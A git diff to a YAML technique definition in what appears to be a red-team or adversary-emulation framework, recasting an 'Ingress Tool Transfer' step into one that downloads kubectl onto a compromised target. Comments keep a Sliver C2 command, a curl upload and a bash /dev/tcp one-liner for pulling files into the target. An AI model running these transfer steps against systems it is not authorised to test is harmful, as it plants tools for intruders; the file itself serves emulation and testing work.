improved handling when TTP fails

diff --git a/armory/TTPs/CommandAndControl/install_kubectl.yaml b/armory/TTPs/CommandAndControl/install_kubectl.yaml
--- a/armory/TTPs/CommandAndControl/install_kubectl.yaml
+++ b/armory/TTPs/CommandAndControl/install_kubectl.yaml
@@ -1,16 +1,19 @@
-name: Upload Tool or File
-description: Transfer tools or other files from an external system into a compromised environment.
+name: Install Kubectl
+description: .
 tactic: Command And Control
 techniques: ["Ingress Tool Transfer"]
 parameters:
   SRC_PATH:
     type: string
+    default: https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl
     description: Path to the file which will be transfered to the target system
   DST_PATH:
     type: string
+    default: /usr/local/bin/kubectl
     description: Path on the target system where the file will be transfered
   Unpack:
     type: bool
+    default: false
     description: Flag if the file should be unpacked after transfer
   # DST_DIR:
   #   type: string
@@ -36,8 +39,7 @@ procedures:
       f=`ls -t | head -n1`; 
       {{ end }}
       echo "file: $f"; 
-      if [ ! -f "$f" ]; then 
-        echo "Could not identify downloaded file." && exit 1; fi;  
+      if [ ! -f "$f" ]; then echo "Could not identify downloaded file." && exit 1; fi;  
       {{ if .Unpack }}
       case "$f" in
         *.tar.gz|*.tgz) out=`tar -xzf "$f"` ;; 
@@ -58,17 +60,12 @@ procedures:
   # - key: curl
   #   command: curl -F 'data=@${SRC_PATH}' ${DST_PATH}
   #   isLocal: true
-  - key: kubectl
-    command: kubectl cp ${SRC_PATH}:${DST_PATH}
-    isLocal: true
-    precondition:
-      - "target.hasBinary(tar)"
   # - key: sliver
   #   command: get_file ${SRC_PATH}
 preconditions:
   accessLevel: user-write
   # kind: Pod, System
 effects:
-  - "target.hasFile"
+  - "target.hasBinary"
 #  try this onliner to download a file
 # bash -c "exec 3<>/dev/tcp/IP/80; echo -e 'GET /youfile.sh HTTP/1.1\r\nHost: ip\r\nConnection: close\r\n\r\n' >&3; cat <&3 > yourfile.sh"
